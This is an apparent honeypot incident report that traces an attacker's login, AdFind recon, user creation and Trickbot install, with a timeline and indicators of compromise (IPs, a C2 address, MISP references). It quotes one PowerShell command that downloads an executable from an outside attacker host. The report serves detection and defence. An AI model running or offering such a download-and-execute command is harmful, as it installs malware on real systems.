An attacker logged into the honeypot, dropped AdFind, a couple batch files and Trickbot. The attacker created a user, ran a recon script utilizing AdFind and then installed Trickbot.
This is what the folder structure looked like.

Timeline
Time in UTC
22:13 – login from 216.170.123[.]19
22:15 – opens powershell and runs the following command to download enter.exe
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Invoke-WebRequest http://support-it.online/upl/data/enter.exe -OutFile c:\users\public\enter.exe
22:17 – ran test_32.exe
22:18 – ran adduser.bat

22:18 – ran enter.exe
22:19 – ran adf.bat

22:22 – socks.exe is run which drops Trickbot

Trickbot
This is a sandbox run of enter.exe which eventually leads to Trickbot


Trickbot checking to see if the IP is blacklisted.

IOCs
All executables and scripts can be found in MISP
MISP Priv 65043
MISP circl osint feed UUID 5e4b486e-9968-4af1-87dc-4ff4950d210f
C2 195.133.145.31 443/tcp
All script commands – pastebin